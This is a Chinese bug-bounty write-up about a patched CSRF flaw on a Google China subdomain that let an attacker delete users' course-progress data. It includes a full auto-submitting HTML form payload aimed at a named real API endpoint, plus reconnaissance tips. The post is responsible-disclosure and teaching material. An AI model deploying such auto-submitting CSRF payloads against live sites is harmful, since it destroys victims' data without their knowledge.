SRC实战 | 谷歌某处csrf漏洞可删用户数据漏洞案例思路分析

1 阅读1分钟

0x01 前言

本文是本人于前两年在谷歌业务发现的漏洞思路,漏洞已经修复并且已经获得谷歌团队许可公开分享,本文仅做漏洞技术思路分享。平台漏洞原文记录链接如下,感兴趣可以去看看:

https://bughunters.google.com/reports/vrp/XWTAskrht

0x02 漏洞挖掘思路

先通过信息收集,发现谷歌在中国业务有以下的域名资产

googlecnapps.cn

通过子域名收集发现

image.png 存在以下子域名资产

https://exporteducationprogram.googlecnapps.cn/training/home

访问该业务,登录后,发现存在删除用户数据内容功能

image.png 发现没有做csrf漏洞攻击的限制,生成poc代码如下,实现其他用户加载这个页面就自动请求这个删除用户数据的接口

<html>
 <body>
<script>history.pushState('', '', '/')
</script>
<form action="https://exporteducationprogram.googlecnapps.cn/appacademy/api/clear" method="POST">
<input id="submit0" type="submit" value="Submit request" />
<script>
window.onload=function(){
document.getElementById("submit0").click();
}
</script>
</form>
</html>

漏洞利用场景及危害

用户访问部署poc的页面即可删除用户数据,如课程学习进度数据在本网站将被删除,会给用户带来不好的体验。

0x03 谷歌的回应

🎉 Nice catch! ,后续就是给了100$。

4-wxgzh.png

0x04 总结

挖国外企业漏洞,可以关注其在国内是否有业务,如果有可以挖一下对应的web、小程序、app、iot资产,这种一般国外的白帽挖的不多,容易产出。